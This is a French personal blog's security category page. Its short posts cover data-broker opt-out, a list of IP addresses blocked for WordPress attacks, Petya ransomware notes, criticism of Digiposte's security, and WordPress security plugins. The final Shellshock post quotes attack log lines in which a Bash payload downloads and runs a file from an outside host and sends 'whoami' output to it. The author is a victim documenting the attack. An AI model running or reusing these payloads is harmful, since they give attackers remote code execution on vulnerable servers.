Securite on Blog GoHugo de Fredô : Linux, Proxmox, IA, Trail, Course, Randonnée, Gravel, Ski de Randonnée

Je ne suis pas une data !

Tue, 30 Apr 2024 00:00:00 +0000

UFC Que Choisir propose une page unique pour demander le retrait de ses données personnelles face aux démarcheurs et revendeurs de prospects : https://www.respectemesdatas.fr/

Wordpress : Liste des IP que j'ai bloqué

Sun, 04 Nov 2018 00:00:00 +0000

Voici la liste des IP que j’ai complètement bloqué, trop d’attaque :

91.200.12.114 (Ukraine)
91.200.12.65 (Ukraine)
91.200.12.4 (Ukraine) 
178.89.110.135 (Kazakhstan)
122.114.251.82 (Chine)
222.86.214.132 (Chine)
192.99.63.202 (Canada)
112.78.5.70 (Vietnam)
81.177.135.161
221.2.137.143

Après #WannaCry ... bonjours à #Petya ! Merci Windows pour toute cette sécurité ...

Tue, 27 Jun 2017 00:00:00 +0000

Les premiers articles sortent :

http://www.francetvinfo.fr/internet/securite-sur-internet/cyberattaques/direct-une-cyberattaque-mondiale-frappe-entreprises-et-administrations_2257807.html
http://www.cert.ssi.gouv.fr/site/CERTFR-2017-ALE-012.pdf
https://www.ssi.gouv.fr/actualite/alerte-campagne-de-rancongiciel-3/
- Référence : CERTFR-2017-ALE-012 :
Faire la mise à jour :Microsoft MS17-010 :

https://technet.microsoft.com/fr-fr/library/security/ms17-010.aspx

Une fois encore c’est Windows qui est impacté … les informations que j’ai :

Quand le PC affiche ceci il faut le rebooter car contrairement a ce qu’il marque il est en cours d’encryption (ensuite il faudra mettre le disque sur une autre machine):
Le message qui apparait à la fin de l’encryption :
Il faut supprimer cette signature (information à confirmer)

Il semblerait aussi qu’il y ait un fichier perfc.dat ou dllhost.dat ou perfc sous C:/Windows/ à supprimer (et non perfc.dll) . Cette information est aussi à confirmer.

Digiposte : je veux plus de sécurité !

Thu, 05 Jan 2017 00:00:00 +0000

J’ai reçu l’email de Digiposte :

En 2016, Digiposte s’est enrichi de plus de 350 organismes. Démarrez 2017 du bon pied en regroupant vos relevés, attestations et factures dans Digiposte.

BESOIN DE PARTAGER VOTRE RIB AVEC UN PROCHE ? CONNECTEZ-VOUS À DIGIPOSTE.

Mais c’est vraiment n’importe quoi … il faut travailler sur la sécurité !

Il faut mettre en place :

une double authentification comme le fait Google+ ou Facebook, alors que eux n’ont pas mon RIB. (optionnel & uniquement pour les abonnés)
une interface pour voir les heures, dates, IP, navigateur de toutes les connexions. Comme le fait Google, Facebook, …
l’envoi d’un email a chaque nouvelle connexion … comme le fait Google, Facebook, … (optionnel)

On ne peut pas mettre des documents plus important que sur Facebook, Google, Twitter, et avoir une sécurité moindre.

Wordfence, mon analyse des attaques "brute force"

Tue, 20 Dec 2016 00:00:00 +0000

Nouvel email ou plutôt SPAM n°121916 de Wordfence :

> After our post on Friday discussing the increase in brute force attacks on WordPress in December, we received a lot of feedback. A few readers reached out to me personally with some additional data. > > A source in Kiev, Ukraine contacted me and this morning we chatted via Skype about the political and military situation in Ukraine. > > We published an update a few minutes ago that shows who is likely behind the attacks and what their motivation might be.

Maintenant il faut vérifier les faits, est-ce que je me fais attaquer par les Russes :

Wordpress : Sécurité

Tue, 20 Dec 2016 00:00:00 +0000

La sécurité passe aussi par l’analyse des logs d’Apache !

Je viens de faire deux POST sur la sécurité :

https://www.cyber-neurones.org/2016/12/wordfence-mon-analyse-des-attaques-brute-force/ : Mon analyse des attaques “Burte force”
https://www.cyber-neurones.org/2016/12/wordfence-mon-analyse-a-partir-des-logs-dapache-des-attaques-par-injection-sql/ : Mon analyse à partir des logs d’Apache des attaques par injection SQL en méthode GET.

Attention a ne pas négliger la sécurité sur Wordpress ! Il existe de bon plugin pour la sécurité :

Word fence Security. Version 6.2.8 | Par Wordfence
- Email a chaque connexion.
- Email a chaque recommandation de mise à jour.
- Diagnostic.
All In One WP Security. Version 4.2.4 | Par Tips and Tricks HQ, Peter, Ruhul, Ivy
- Filtre IP : Liste notre .
Captcha by BestWebSoft. Version 4.2.8 | Par BestWebSoft
WP-SpamShield. Version 1.9.9.8 | Par Scott Allen
- Eviter le SPAM dans les commentaires.

Juste pour bien ce rendre compte, voici la commande pour voir le nombre d’attaques “Brute force” (voir le précédent post pour la création du fichier wp-login.txt). Certains jours on arrive a des nombres de connexions très important !

Digiposte+ : Beaucoup de progrès mais pas sur la sécurité !

Sat, 19 Nov 2016 00:00:00 +0000

Beaucoup de progrès ont été fait sur Digiposte+ (#digiposte #digiposte+), maintenant il y a énormément de commerçants et bientôt il y aura la certification de diplôme. Mais le point noir c’est toujours la sécurité. La sécurité doit être supérieur à celle de Google ou même de Facebook ! Comment peut-on envisager de voir une copie de sa carte d’identité ou de son bulletin de paye dans les mains d’autres personnes.

Digiposte : un bon service mais perfectible

Wed, 03 Dec 2014 00:00:00 +0000

Digiposte est un service de coffre-fort électronique (ou numérique). J’ai testé ce service Digiposte : https://www.digiposte.fr/ c’est un bon service mais il me semble qu’il y a quelques manques :

Le nombre de sites utilisant ce service n’est pas encore assez important. Mais les principaux acteurs sont présents ce qui est très bien. Ceux sont les banques qui sont les grandes absentes … Il est clair que La Poste est en concurrence avec des banques vu que c’est une banque, en plus certaines banques comme la caisse d’épargne a déjà un service de coffre fort électronique mais payant, et d’autres banques comme AXA Banque font payer les relevés …Mais le plus important c’est d’intégrer un maximum de site, Google a très bien compris cela et il essaye toujours d’être le plus ouvert possible. A noter aussi que pour l’Apple Store on ne peut pas vraiment dire que cela fonctionne bien. Très important
1. Les plus grandes banques en France :
  1. BNP Paribas : absent.
  2. Les caisses d’épargne : absent.
  3. Crédit agricole : absent.
  4. AXA Banque : absent.
  5. Société générale : absent.
  6. CIC / Crédit mutuel : présent.
  7. La poste : présent :).
2. Au niveau des services il manque :
  1. digitick.com : Vente de billet.
  2. phpnet.org : Hébergeur, le meilleur.
  3. Gaumont : Vente de billet.
  4. Pixmania :
  5. Décathlon :
  6. ….
Il faudrait le calcul d’un checksum sur chaque fichier afin que l’utilisateur puisse voir si le fichier est en doublon. Avec un système à “plat” il est très facile d’avoir des doublons de fichiers. Ensuite, c’est à l’utilisateur de prendre la décision de garder ou supprimer le fichier. Très important
Ajouter un colonne date modifiable par l’utilisateur, par exemple la date du scan n’est pas la date du document qui est scanné. En fait, il faudrait deux dates: date de dépôt du fichier et date d’édition du fichier (modifiable quand c’est déposé par l’utilisateur). Très important
1. Voici les colonnes actuellement disponible :
il serait bien d’avoir une “preview” des fichiers. A faire
L’application IPhone est minimaliste, on a du mal à faire une recherche …A faire
Pour l’application IPad cela serait bien d’avoir un système qui permette la synchronisation des fichiers et pas seulement la visualisation. Cela permet de pouvoir disposer des fichiers en mode “Offline". Important
L’ajout du type de document dans les colonnes serait aussi un plus, actuellement il existe seulement Facture & relevé et c’est uniquement quand c’est un tiers qui transmet : (Important)
1. Facture, ( Commerces )
2. Relevé, ( Relevé Bancaire, Relevé de téléphone)
3. Licence, ( Licence de sport )
4. Photo, ( Pour Digishoot )
5. Diplome, ( Diplome, Examen)
6. Permis, ( Permis de conduire, Permis de bateau, … )
7. Contrôle, ( Contrôle technique, )
8. Identité, ( CNI , Carte grise, Passeport )
9. Billet, ( Par exemple : billet d’avion, place avec QR-Code )
10. Garantie, ( Garanti )
11. Attestation, ( Attestation d’emploi, Attestation de sport, Attestation de mutuelle)
12. Devis, ( Devis )
13. Acompte, (Acompte )
14. Courrier, ( Lettre importante )
15. Acte, (Acte notarié )
16. Comptabilité, ( Pour les personnes qui ont des entreprises ou SCI ou les auto-entrepreneurs )
17. Paie ( Feuille de paye )
18. Listes ( Carnet d’adresse, Listes diverses ).
19. Santé ( Examen ).
20. Facture Client ( Pour les auto-entrepreneurs ).
21. Numéro de série ( Pour avoir le numéro de sérié de ce que l’on a acheté, le plus pratique étant de faire une photo de la boite lors de l’achat).
22. Capture ( Un peu comme DigiShoot , un service de capture de site Web avec date de la capture par un Tiers , une sorte de DigiWeb . Mais bon cela serait un peu complexe si c’est sur Facebook , s’il y a besoin d’une authentification )
23. Agenda ( Pour Nicolas … certain garde leur agenda)
24. Autres (Pour les personnes voulant faire de l’archivage de document personnel comme des photos de vacance ou autres ).
Que l’application Digishoot soit gratuite (je sais j’abuse), actuellement ce service est gratuit dans d’autres assurances. Je trouve que cette application peut être utile : A faire
1. en cas de sinistre,
2. en cas de construction (affichage du permis),
3. pour les associations qui veulent faire constater,
Avoir une notification quand on partage un document et que la personne y accède. A faire
L’ajout de la colonne taille . Quand on veut faire du ménage c’est pratique de commencer à supprimer les plus volumineux. A faire
L’ajout de la colonne date fin de validité (facultative), pour par exemple : les garantis, le contrôle technique, les CNI, …Le jours avant la fin de validité on reçoit un email. Cela permet de supprimer le document. Important.
L’ajout d’une personne (email + adresse : pour livraison d’un CD-ROM) dans les paramètres afin que le compte puisse être céder à un tiers en cas de décès. On va dire que c’est une option “testamentaire”, qui serait facultative. Important.
L’ajout d’une colonne ID unique, qui permet de faire un lien entre une application cliente et Digiposte. Le plus important quand on développe un service c’est de l’ouvrir un maximum afin de permettre une intégration facile (voir les produits Google). A faire.

Malgré tous les points à corriger, je pense que ce type d’application à de l’avenir. Il faudrait que le service se rémunère sur l’espace disque utilisé. Ou alors offre des services qui serait

Sécurité : shellshock ...

Thu, 06 Nov 2014 00:00:00 +0000

Attaque sur mon serveur :

WinInet Test
curl/7.19.7 (i386-redhat-linux-gnu) libcurl/7.19.7 NSS/3.13.6.0 zlib/1.2.3 libidn/1.18 libssh2/1.4.2				cURL
() { :;}; /bin/bash -c \\"wget http://ntontomou.com/s ;chmod +x s ; ./s\\"

Un petit Whois sur : http://www.ntontomou.com/ : https://who.is/whois/ntontomou.com …. il reste plus qu’a contacter http://www.enom.com. Misère.

D’après les logs c’est pas son premier essai :

() { :;}; /bin/bash -c \“curl http://ntontomou.com/custom/ping.php?domain=sphinux.org\\&whoami=`whoami`\”

D’abord du PHP puis maintenant un soft en C.